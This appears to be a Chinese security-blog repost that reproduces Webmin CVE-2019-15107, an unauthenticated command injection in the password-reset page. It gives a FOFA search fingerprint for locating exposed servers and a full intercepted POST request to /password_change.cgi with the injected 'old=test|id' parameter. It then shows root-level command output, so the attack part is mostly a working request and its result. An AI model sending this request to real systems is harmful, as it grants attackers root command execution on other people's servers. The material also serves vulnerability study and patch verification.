【】-webmin CVE-2019-15107

0x01 webmin描述

Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。

图片[1]-【】-webmin CVE-2019-15107-安全小天地

0x002 漏洞复现

fofa:fid=\"msMQZIdASsAWP2cTH1/Pow==\"

1.输入账户密码rootxx 123456

图片[2]-【】-webmin CVE-2019-15107-安全小天地

2.burpsuit抓包

图片[3]-【】-webmin CVE-2019-15107-安全小天地

3.改包,详情如下

POST /password_change.cgi HTTP/1.1

Host: x.x.x.x:24567

Cookie: redirect=1; testing=1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: https://x.x.x.x:24567

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

Origin: https://x.x.x.x:24567

Dnt: 1

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

Te: trailers

Connection: close

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

需要更改的地方:

POST /password_change.cgi HTTP/1.1
Referer: https://x.x.x.x:24567
Origin: https://x.x.x.x:24567
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

其中id参数是执行的exp

4.执行命令成功,回显出id值为id=0(root) gid=0(root) groups=0(root)

图片[4]-【】-webmin CVE-2019-15107-安全小天地

(注:禁止将此分享用于非授权测试)

本文转载于公众号: 融云攻防实验室,原文地址:漏洞复现-webmin CVE-2019-15107

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容